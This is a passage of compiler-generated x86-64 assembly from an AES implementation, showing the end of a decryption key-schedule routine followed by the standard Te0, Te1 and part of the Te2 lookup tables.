movl %eax, -32(%rbp)
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
movl -32(%rbp), %edx
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -32(%rbp)
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -32(%rbp), %edx
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -32(%rbp)
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -32(%rbp), %edx
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -32(%rbp)
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -32(%rbp), %edx
movq -8(%rbp), %rax
movl -28(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
## %bb.3: ## in Loop: Header=BB3_1 Depth=1
movl -24(%rbp), %eax
addl $4, %eax
movl %eax, -24(%rbp)
movl -28(%rbp), %eax
subl $4, %eax
movl %eax, -28(%rbp)
jmp LBB3_1
LBB3_4:
movl $1, -24(%rbp)
LBB3_5: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB3_8
## %bb.6: ## in Loop: Header=BB3_5 Depth=1
movq -8(%rbp), %rax
addq $16, %rax
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
movl (%rax), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -8(%rbp), %rax
movl (%rax), %eax
shrl $16, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td1(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl (%rax), %eax
shrl $8, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td2(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl (%rax), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td3(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
movq -8(%rbp), %rax
movl 4(%rax), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -8(%rbp), %rax
movl 4(%rax), %eax
shrl $16, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td1(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 4(%rax), %eax
shrl $8, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td2(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 4(%rax), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td3(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl %ecx, 4(%rax)
movq -8(%rbp), %rax
movl 8(%rax), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -8(%rbp), %rax
movl 8(%rax), %eax
shrl $16, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td1(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 8(%rax), %eax
shrl $8, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td2(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 8(%rax), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td3(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl %ecx, 8(%rax)
movq -8(%rbp), %rax
movl 12(%rax), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te4(%rip), %rax
movl (%rax,%rcx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Td0(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -8(%rbp), %rax
movl 12(%rax), %eax
shrl $16, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td1(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 12(%rax), %eax
shrl $8, %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td2(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl 12(%rax), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Te4(%rip), %rax
movl (%rax,%rdx,4), %eax
andl $255, %eax
movl %eax, %eax
movl %eax, %edx
leaq _Td3(%rip), %rax
xorl (%rax,%rdx,4), %ecx
movq -8(%rbp), %rax
movl %ecx, 12(%rax)
## %bb.7: ## in Loop: Header=BB3_5 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB3_5
LBB3_8:
movl -20(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__const
.p2align 4 ## @Te0
_Te0:
.long 3328402341 ## 0xc66363a5
.long 4168907908 ## 0xf87c7c84
.long 4000806809 ## 0xee777799
.long 4135287693 ## 0xf67b7b8d
.long 4294111757 ## 0xfff2f20d
.long 3597364157 ## 0xd66b6bbd
.long 3731845041 ## 0xde6f6fb1
.long 2445657428 ## 0x91c5c554
.long 1613770832 ## 0x60303050
.long 33620227 ## 0x2010103
.long 3462883241 ## 0xce6767a9
.long 1445669757 ## 0x562b2b7d
.long 3892248089 ## 0xe7fefe19
.long 3050821474 ## 0xb5d7d762
.long 1303096294 ## 0x4dababe6
.long 3967186586 ## 0xec76769a
.long 2412431941 ## 0x8fcaca45
.long 528646813 ## 0x1f82829d
.long 2311702848 ## 0x89c9c940
.long 4202528135 ## 0xfa7d7d87
.long 4026202645 ## 0xeffafa15
.long 2992200171 ## 0xb25959eb
.long 2387036105 ## 0x8e4747c9
.long 4226871307 ## 0xfbf0f00b
.long 1101901292 ## 0x41adadec
.long 3017069671 ## 0xb3d4d467
.long 1604494077 ## 0x5fa2a2fd
.long 1169141738 ## 0x45afafea
.long 597466303 ## 0x239c9cbf
.long 1403299063 ## 0x53a4a4f7
.long 3832705686 ## 0xe4727296
.long 2613100635 ## 0x9bc0c05b
.long 1974974402 ## 0x75b7b7c2
.long 3791519004 ## 0xe1fdfd1c
.long 1033081774 ## 0x3d9393ae
.long 1277568618 ## 0x4c26266a
.long 1815492186 ## 0x6c36365a
.long 2118074177 ## 0x7e3f3f41
.long 4126668546 ## 0xf5f7f702
.long 2211236943 ## 0x83cccc4f
.long 1748251740 ## 0x6834345c
.long 1369810420 ## 0x51a5a5f4
.long 3521504564 ## 0xd1e5e534
.long 4193382664 ## 0xf9f1f108
.long 3799085459 ## 0xe2717193
.long 2883115123 ## 0xabd8d873
.long 1647391059 ## 0x62313153
.long 706024767 ## 0x2a15153f
.long 134480908 ## 0x804040c
.long 2512897874 ## 0x95c7c752
.long 1176707941 ## 0x46232365
.long 2646852446 ## 0x9dc3c35e
.long 806885416 ## 0x30181828
.long 932615841 ## 0x379696a1
.long 168101135 ## 0xa05050f
.long 798661301 ## 0x2f9a9ab5
.long 235341577 ## 0xe070709
.long 605164086 ## 0x24121236
.long 461406363 ## 0x1b80809b
.long 3756188221 ## 0xdfe2e23d
.long 3454790438 ## 0xcdebeb26
.long 1311188841 ## 0x4e272769
.long 2142417613 ## 0x7fb2b2cd
.long 3933566367 ## 0xea75759f
.long 302582043 ## 0x1209091b
.long 495158174 ## 0x1d83839e
.long 1479289972 ## 0x582c2c74
.long 874125870 ## 0x341a1a2e
.long 907746093 ## 0x361b1b2d
.long 3698224818 ## 0xdc6e6eb2
.long 3025820398 ## 0xb45a5aee
.long 1537253627 ## 0x5ba0a0fb
.long 2756858614 ## 0xa45252f6
.long 1983593293 ## 0x763b3b4d
.long 3084310113 ## 0xb7d6d661
.long 2108928974 ## 0x7db3b3ce
.long 1378429307 ## 0x5229297b
.long 3722699582 ## 0xdde3e33e
.long 1580150641 ## 0x5e2f2f71
.long 327451799 ## 0x13848497
.long 2790478837 ## 0xa65353f5
.long 3117535592 ## 0xb9d1d168
.long 0 ## 0x0
.long 3253595436 ## 0xc1eded2c
.long 1075847264 ## 0x40202060
.long 3825007647 ## 0xe3fcfc1f
.long 2041688520 ## 0x79b1b1c8
.long 3059440621 ## 0xb65b5bed
.long 3563743934 ## 0xd46a6abe
.long 2378943302 ## 0x8dcbcb46
.long 1740553945 ## 0x67bebed9
.long 1916352843 ## 0x7239394b
.long 2487896798 ## 0x944a4ade
.long 2555137236 ## 0x984c4cd4
.long 2958579944 ## 0xb05858e8
.long 2244988746 ## 0x85cfcf4a
.long 3151024235 ## 0xbbd0d06b
.long 3320835882 ## 0xc5efef2a
.long 1336584933 ## 0x4faaaae5
.long 3992714006 ## 0xedfbfb16
.long 2252555205 ## 0x864343c5
.long 2588757463 ## 0x9a4d4dd7
.long 1714631509 ## 0x66333355
.long 293963156 ## 0x11858594
.long 2319795663 ## 0x8a4545cf
.long 3925473552 ## 0xe9f9f910
.long 67240454 ## 0x4020206
.long 4269768577 ## 0xfe7f7f81
.long 2689618160 ## 0xa05050f0
.long 2017213508 ## 0x783c3c44
.long 631218106 ## 0x259f9fba
.long 1269344483 ## 0x4ba8a8e3
.long 2723238387 ## 0xa25151f3
.long 1571005438 ## 0x5da3a3fe
.long 2151694528 ## 0x804040c0
.long 93294474 ## 0x58f8f8a
.long 1066570413 ## 0x3f9292ad
.long 563977660 ## 0x219d9dbc
.long 1882732616 ## 0x70383848
.long 4059428100 ## 0xf1f5f504
.long 1673313503 ## 0x63bcbcdf
.long 2008463041 ## 0x77b6b6c1
.long 2950355573 ## 0xafdada75
.long 1109467491 ## 0x42212163
.long 537923632 ## 0x20101030
.long 3858759450 ## 0xe5ffff1a
.long 4260623118 ## 0xfdf3f30e
.long 3218264685 ## 0xbfd2d26d
.long 2177748300 ## 0x81cdcd4c
.long 403442708 ## 0x180c0c14
.long 638784309 ## 0x26131335
.long 3287084079 ## 0xc3ecec2f
.long 3193921505 ## 0xbe5f5fe1
.long 899127202 ## 0x359797a2
.long 2286175436 ## 0x884444cc
.long 773265209 ## 0x2e171739
.long 2479146071 ## 0x93c4c457
.long 1437050866 ## 0x55a7a7f2
.long 4236148354 ## 0xfc7e7e82
.long 2050833735 ## 0x7a3d3d47
.long 3362022572 ## 0xc86464ac
.long 3126681063 ## 0xba5d5de7
.long 840505643 ## 0x3219192b
.long 3866325909 ## 0xe6737395
.long 3227541664 ## 0xc06060a0
.long 427917720 ## 0x19818198
.long 2655997905 ## 0x9e4f4fd1
.long 2749160575 ## 0xa3dcdc7f
.long 1143087718 ## 0x44222266
.long 1412049534 ## 0x542a2a7e
.long 999329963 ## 0x3b9090ab
.long 193497219 ## 0xb888883
.long 2353415882 ## 0x8c4646ca
.long 3354324521 ## 0xc7eeee29
.long 1807268051 ## 0x6bb8b8d3
.long 672404540 ## 0x2814143c
.long 2816401017 ## 0xa7dede79
.long 3160301282 ## 0xbc5e5ee2
.long 369822493 ## 0x160b0b1d
.long 2916866934 ## 0xaddbdb76
.long 3688947771 ## 0xdbe0e03b
.long 1681011286 ## 0x64323256
.long 1949973070 ## 0x743a3a4e
.long 336202270 ## 0x140a0a1e
.long 2454276571 ## 0x924949db
.long 201721354 ## 0xc06060a
.long 1210328172 ## 0x4824246c
.long 3093060836 ## 0xb85c5ce4
.long 2680341085 ## 0x9fc2c25d
.long 3184776046 ## 0xbdd3d36e
.long 1135389935 ## 0x43acacef
.long 3294782118 ## 0xc46262a6
.long 965841320 ## 0x399191a8
.long 831886756 ## 0x319595a4
.long 3554993207 ## 0xd3e4e437
.long 4068047243 ## 0xf279798b
.long 3588745010 ## 0xd5e7e732
.long 2345191491 ## 0x8bc8c843
.long 1849112409 ## 0x6e373759
.long 3664604599 ## 0xda6d6db7
.long 26054028 ## 0x18d8d8c
.long 2983581028 ## 0xb1d5d564
.long 2622377682 ## 0x9c4e4ed2
.long 1235855840 ## 0x49a9a9e0
.long 3630984372 ## 0xd86c6cb4
.long 2891339514 ## 0xac5656fa
.long 4092916743 ## 0xf3f4f407
.long 3488279077 ## 0xcfeaea25
.long 3395642799 ## 0xca6565af
.long 4101667470 ## 0xf47a7a8e
.long 1202630377 ## 0x47aeaee9
.long 268961816 ## 0x10080818
.long 1874508501 ## 0x6fbabad5
.long 4034427016 ## 0xf0787888
.long 1243948399 ## 0x4a25256f
.long 1546530418 ## 0x5c2e2e72
.long 941366308 ## 0x381c1c24
.long 1470539505 ## 0x57a6a6f1
.long 1941222599 ## 0x73b4b4c7
.long 2546386513 ## 0x97c6c651
.long 3421038627 ## 0xcbe8e823
.long 2715671932 ## 0xa1dddd7c
.long 3899946140 ## 0xe874749c
.long 1042226977 ## 0x3e1f1f21
.long 2521517021 ## 0x964b4bdd
.long 1639824860 ## 0x61bdbddc
.long 227249030 ## 0xd8b8b86
.long 260737669 ## 0xf8a8a85
.long 3765465232 ## 0xe0707090
.long 2084453954 ## 0x7c3e3e42
.long 1907733956 ## 0x71b5b5c4
.long 3429263018 ## 0xcc6666aa
.long 2420656344 ## 0x904848d8
.long 100860677 ## 0x6030305
.long 4160157185 ## 0xf7f6f601
.long 470683154 ## 0x1c0e0e12
.long 3261161891 ## 0xc26161a3
.long 1781871967 ## 0x6a35355f
.long 2924959737 ## 0xae5757f9
.long 1773779408 ## 0x69b9b9d0
.long 394692241 ## 0x17868691
.long 2579611992 ## 0x99c1c158
.long 974986535 ## 0x3a1d1d27
.long 664706745 ## 0x279e9eb9
.long 3655459128 ## 0xd9e1e138
.long 3958962195 ## 0xebf8f813
.long 731420851 ## 0x2b9898b3
.long 571543859 ## 0x22111133
.long 3530123707 ## 0xd26969bb
.long 2849626480 ## 0xa9d9d970
.long 126783113 ## 0x78e8e89
.long 865375399 ## 0x339494a7
.long 765172662 ## 0x2d9b9bb6
.long 1008606754 ## 0x3c1e1e22
.long 361203602 ## 0x15878792
.long 3387549984 ## 0xc9e9e920
.long 2278477385 ## 0x87cece49
.long 2857719295 ## 0xaa5555ff
.long 1344809080 ## 0x50282878
.long 2782912378 ## 0xa5dfdf7a
.long 59542671 ## 0x38c8c8f
.long 1503764984 ## 0x59a1a1f8
.long 160008576 ## 0x9898980
.long 437062935 ## 0x1a0d0d17
.long 1707065306 ## 0x65bfbfda
.long 3622233649 ## 0xd7e6e631
.long 2218934982 ## 0x844242c6
.long 3496503480 ## 0xd06868b8
.long 2185314755 ## 0x824141c3
.long 697932208 ## 0x299999b0
.long 1512910199 ## 0x5a2d2d77
.long 504303377 ## 0x1e0f0f11
.long 2075177163 ## 0x7bb0b0cb
.long 2824099068 ## 0xa85454fc
.long 1841019862 ## 0x6dbbbbd6
.long 739644986 ## 0x2c16163a
.p2align 4 ## @Te1
_Te1:
.long 2781242211 ## 0xa5c66363
.long 2230877308 ## 0x84f87c7c
.long 2582542199 ## 0x99ee7777
.long 2381740923 ## 0x8df67b7b
.long 234877682 ## 0xdfff2f2
.long 3184946027 ## 0xbdd66b6b
.long 2984144751 ## 0xb1de6f6f
.long 1418839493 ## 0x5491c5c5
.long 1348481072 ## 0x50603030
.long 50462977 ## 0x3020101
.long 2848876391 ## 0xa9ce6767
.long 2102799147 ## 0x7d562b2b
.long 434634494 ## 0x19e7fefe
.long 1656084439 ## 0x62b5d7d7
.long 3863849899 ## 0xe64dabab
.long 2599188086 ## 0x9aec7676
.long 1167051466 ## 0x458fcaca
.long 2636087938 ## 0x9d1f8282
.long 1082771913 ## 0x4089c9c9
.long 2281340285 ## 0x87fa7d7d
.long 368048890 ## 0x15effafa
.long 3954334041 ## 0xebb25959
.long 3381544775 ## 0xc98e4747
.long 201060592 ## 0xbfbf0f0
.long 3963727277 ## 0xec41adad
.long 1739838676 ## 0x67b3d4d4
.long 4250903202 ## 0xfd5fa2a2
.long 3930435503 ## 0xea45afaf
.long 3206782108 ## 0xbf239c9c
.long 4149453988 ## 0xf753a4a4
.long 2531553906 ## 0x96e47272
.long 1536934080 ## 0x5b9bc0c0
.long 3262494647 ## 0xc275b7b7
.long 484572669 ## 0x1ce1fdfd
.long 2923271059 ## 0xae3d9393
.long 1783375398 ## 0x6a4c2626
.long 1517041206 ## 0x5a6c3636
.long 1098792767 ## 0x417e3f3f
.long 49674231 ## 0x2f5f7f7
.long 1334037708 ## 0x4f83cccc
.long 1550332980 ## 0x5c683434
.long 4098991525 ## 0xf451a5a5
.long 886171109 ## 0x34d1e5e5
.long 150598129 ## 0x8f9f1f1
.long 2481090929 ## 0x93e27171
.long 1940642008 ## 0x73abd8d8
.long 1398944049 ## 0x53623131
.long 1059722517 ## 0x3f2a1515
.long 201851908 ## 0xc080404
.long 1385547719 ## 0x5295c7c7
.long 1699095331 ## 0x65462323
.long 1587397571 ## 0x5e9dc3c3
.long 674240536 ## 0x28301818
.long 2704774806 ## 0xa1379696
.long 252314885 ## 0xf0a0505
.long 3039795866 ## 0xb52f9a9a
.long 151914247 ## 0x90e0707
.long 908333586 ## 0x36241212
.long 2602270848 ## 0x9b1b8080
.long 1038082786 ## 0x3ddfe2e2
.long 651029483 ## 0x26cdebeb
.long 1766729511 ## 0x694e2727
.long 3447698098 ## 0xcd7fb2b2
.long 2682942837 ## 0x9fea7575
.long 454166793 ## 0x1b120909
.long 2652734339 ## 0x9e1d8383
.long 1951935532 ## 0x74582c2c
.long 775166490 ## 0x2e341a1a
.long 758520603 ## 0x2d361b1b
.long 3000790638 ## 0xb2dc6e6e
.long 4004797018 ## 0xeeb45a5a
.long 4217086112 ## 0xfb5ba0a0
.long 4137964114 ## 0xf6a45252
.long 1299594043 ## 0x4d763b3b
.long 1639438038 ## 0x61b7d6d6
.long 3464344499 ## 0xce7db3b3
.long 2068982057 ## 0x7b522929
.long 1054729187 ## 0x3edde3e3
.long 1901997871 ## 0x715e2f2f
.long 2534638724 ## 0x97138484
.long 4121318227 ## 0xf5a65353
.long 1757008337 ## 0x68b9d1d1
.long 0 ## 0x0
.long 750906861 ## 0x2cc1eded
.long 1614815264 ## 0x60402020
.long 535035132 ## 0x1fe3fcfc
.long 3363418545 ## 0xc879b1b1
.long 3988151131 ## 0xedb65b5b
.long 3201591914 ## 0xbed46a6a
.long 1183697867 ## 0x468dcbcb
.long 3647454910 ## 0xd967bebe
.long 1265776953 ## 0x4b723939
.long 3734260298 ## 0xde944a4a
.long 3566750796 ## 0xd4984c4c
.long 3903871064 ## 0xe8b05858
.long 1250283471 ## 0x4a85cfcf
.long 1807470800 ## 0x6bbbd0d0
.long 717615087 ## 0x2ac5efef
.long 3847203498 ## 0xe54faaaa
.long 384695291 ## 0x16edfbfb
.long 3313910595 ## 0xc5864343
.long 3617213773 ## 0xd79a4d4d
.long 1432761139 ## 0x55663333
.long 2484176261 ## 0x94118585
.long 3481945413 ## 0xcf8a4545
.long 283769337 ## 0x10e9f9f9
.long 100925954 ## 0x6040202
.long 2180939647 ## 0x81fe7f7f
.long 4037038160 ## 0xf0a05050
.long 1148730428 ## 0x44783c3c
.long 3123027871 ## 0xba259f9f
.long 3813386408 ## 0xe34ba8a8
.long 4087501137 ## 0xf3a25151
.long 4267549603 ## 0xfe5da3a3
.long 3229630528 ## 0xc0804040
.long 2315620239 ## 0x8a058f8f
.long 2906624658 ## 0xad3f9292
.long 3156319645 ## 0xbc219d9d
.long 1215313976 ## 0x48703838
.long 82966005 ## 0x4f1f5f5
.long 3747855548 ## 0xdf63bcbc
.long 3245848246 ## 0xc177b6b6
.long 1974459098 ## 0x75afdada
.long 1665278241 ## 0x63422121
.long 807407632 ## 0x30201010
.long 451280895 ## 0x1ae5ffff
.long 251524083 ## 0xefdf3f3
.long 1841287890 ## 0x6dbfd2d2
.long 1283575245 ## 0x4c81cdcd
.long 337120268 ## 0x14180c0c
.long 891687699 ## 0x35261313
.long 801369324 ## 0x2fc3ecec
.long 3787349855 ## 0xe1be5f5f
.long 2721421207 ## 0xa2359797
.long 3431482436 ## 0xcc884444
.long 959321879 ## 0x392e1717
.long 1469301956 ## 0x5793c4c4
.long 4065699751 ## 0xf255a7a7
.long 2197585534 ## 0x82fc7e7e
.long 1199193405 ## 0x477a3d3d
.long 2898814052 ## 0xacc86464
.long 3887750493 ## 0xe7ba5d5d
.long 724703513 ## 0x2b321919
.long 2514908019 ## 0x95e67373
.long 2696962144 ## 0xa0c06060
.long 2551808385 ## 0x98198181
.long 3516813135 ## 0xd19e4f4f
.long 2141445340 ## 0x7fa3dcdc
.long 1715741218 ## 0x66442222
.long 2119445034 ## 0x7e542a2a
.long 2872807568 ## 0xab3b9090
.long 2198571144 ## 0x830b8888
.long 3398190662 ## 0xca8c4646
.long 700968686 ## 0x29c7eeee
.long 3547052216 ## 0xd36bb8b8
.long 1009259540 ## 0x3c281414
.long 2041044702 ## 0x79a7dede
.long 3803995742 ## 0xe2bc5e5e
.long 487983883 ## 0x1d160b0b
.long 1991105499 ## 0x76addbdb
.long 1004265696 ## 0x3bdbe0e0
.long 1449407026 ## 0x56643232
.long 1316239930 ## 0x4e743a3a
.long 504629770 ## 0x1e140a0a
.long 3683797321 ## 0xdb924949
.long 168560134 ## 0xa0c0606
.long 1816667172 ## 0x6c482424
.long 3837287516 ## 0xe4b85c5c
.long 1570751170 ## 0x5d9fc2c2
.long 1857934291 ## 0x6ebdd3d3
.long 4014189740 ## 0xef43acac
.long 2797888098 ## 0xa6c46262
.long 2822345105 ## 0xa8399191
.long 2754712981 ## 0xa4319595
.long 936633572 ## 0x37d3e4e4
.long 2347923833 ## 0x8bf27979
.long 852879335 ## 0x32d5e7e7
.long 1133234376 ## 0x438bc8c8
.long 1500395319 ## 0x596e3737
.long 3084545389 ## 0xb7da6d6d
.long 2348912013 ## 0x8c018d8d
.long 1689376213 ## 0x64b1d5d5
.long 3533459022 ## 0xd29c4e4e
.long 3762923945 ## 0xe049a9a9
.long 3034082412 ## 0xb4d86c6c
.long 4205598294 ## 0xfaac5656
.long 133428468 ## 0x7f3f4f4
.long 634383082 ## 0x25cfeaea
.long 2949277029 ## 0xafca6565
.long 2398386810 ## 0x8ef47a7a
.long 3913789102 ## 0xe947aeae
.long 403703816 ## 0x18100808
.long 3580869306 ## 0xd56fbaba
.long 2297460856 ## 0x88f07878
.long 1867130149 ## 0x6f4a2525
.long 1918643758 ## 0x725c2e2e
.long 607656988 ## 0x24381c1c
.long 4049053350 ## 0xf157a6a6
.long 3346248884 ## 0xc773b4b4
.long 1368901318 ## 0x5197c6c6
.long 600565992 ## 0x23cbe8e8
.long 2090982877 ## 0x7ca1dddd
.long 2632479860 ## 0x9ce87474
.long 557719327 ## 0x213e1f1f
.long 3717614411 ## 0xdd964b4b
.long 3697393085 ## 0xdc61bdbd
.long 2249034635 ## 0x860d8b8b
.long 2232388234 ## 0x850f8a8a
.long 2430627952 ## 0x90e07070
.long 1115438654 ## 0x427c3e3e
.long 3295786421 ## 0xc471b5b5
.long 2865522278 ## 0xaacc6666
.long 3633334344 ## 0xd8904848
.long 84280067 ## 0x5060303
.long 33027830 ## 0x1f7f6f6
.long 303828494 ## 0x121c0e0e
.long 2747425121 ## 0xa3c26161
.long 1600795957 ## 0x5f6a3535
.long 4188952407 ## 0xf9ae5757
.long 3496589753 ## 0xd069b9b9
.long 2434238086 ## 0x91178686
.long 1486471617 ## 0x5899c1c1
.long 658119965 ## 0x273a1d1d
.long 3106381470 ## 0xb9279e9e
.long 953803233 ## 0x38d9e1e1
.long 334231800 ## 0x13ebf8f8
.long 3005978776 ## 0xb32b9898
.long 857870609 ## 0x33221111
.long 3151128937 ## 0xbbd26969
.long 1890179545 ## 0x70a9d9d9
.long 2298973838 ## 0x89078e8e
.long 2805175444 ## 0xa7339494
.long 3056442267 ## 0xb62d9b9b
.long 574365214 ## 0x223c1e1e
.long 2450884487 ## 0x92158787
.long 550103529 ## 0x20c9e9e9
.long 1233637070 ## 0x4987cece
.long 4289353045 ## 0xffaa5555
.long 2018519080 ## 0x78502828
.long 2057691103 ## 0x7aa5dfdf
.long 2399374476 ## 0x8f038c8c
.long 4166623649 ## 0xf859a1a1
.long 2148108681 ## 0x80098989
.long 387583245 ## 0x171a0d0d
.long 3664101311 ## 0xda65bfbf
.long 836232934 ## 0x31d7e6e6
.long 3330556482 ## 0xc6844242
.long 3100665960 ## 0xb8d06868
.long 3280093505 ## 0xc3824141
.long 2955516313 ## 0xb0299999
.long 2002398509 ## 0x775a2d2d
.long 287182607 ## 0x111e0f0f
.long 3413881008 ## 0xcb7bb0b0
.long 4238890068 ## 0xfca85454
.long 3597515707 ## 0xd66dbbbb
.long 975967766 ## 0x3a2c1616
.p2align 4 ## @Te2
_Te2:
.long 1671808611 ## 0x63a5c663
.long 2089089148 ## 0x7c84f87c
.long 2006576759 ## 0x7799ee77
.long 2072901243 ## 0x7b8df67b
.long 4061003762 ## 0xf20dfff2
.long 1807603307 ## 0x6bbdd66b
.long 1873927791 ## 0x6fb1de6f
.long 3310653893 ## 0xc55491c5
.long 810573872 ## 0x30506030
.long 16974337 ## 0x1030201
.long 1739181671 ## 0x67a9ce67
.long 729634347 ## 0x2b7d562b
.long 4263110654 ## 0xfe19e7fe
.long 3613570519 ## 0xd762b5d7
.long 2883997099 ## 0xabe64dab
.long 1989864566 ## 0x769aec76
.long 3393556426 ## 0xca458fca
.long 2191335298 ## 0x829d1f82
.long 3376449993 ## 0xc94089c9
.long 2106063485 ## 0x7d87fa7d
.long 4195741690 ## 0xfa15effa
.long 1508618841 ## 0x59ebb259
.long 1204391495 ## 0x47c98e47
.long 4027317232 ## 0xf00bfbf0
.long 2917941677 ## 0xadec41ad
.long 3563566036 ## 0xd467b3d4
.long 2734514082 ## 0xa2fd5fa2
.long 2951366063 ## 0xafea45af
.long 2629772188 ## 0x9cbf239c
.long 2767672228 ## 0xa4f753a4
.long 1922491506 ## 0x7296e472
.long 3227229120 ## 0xc05b9bc0
.long 3082974647 ## 0xb7c275b7
.long 4246528509 ## 0xfd1ce1fd
.long 2477669779 ## 0x93ae3d93
.long 644500518 ## 0x266a4c26
.long 911895606 ## 0x365a6c36
.long 1061256767 ## 0x3f417e3f
.long 4144166391 ## 0xf702f5f7
.long 3427763148 ## 0xcc4f83cc
.long 878471220 ## 0x345c6834
.long 2784252325 ## 0xa5f451a5
.long 3845444069 ## 0xe534d1e5
.long 4043897329 ## 0xf108f9f1
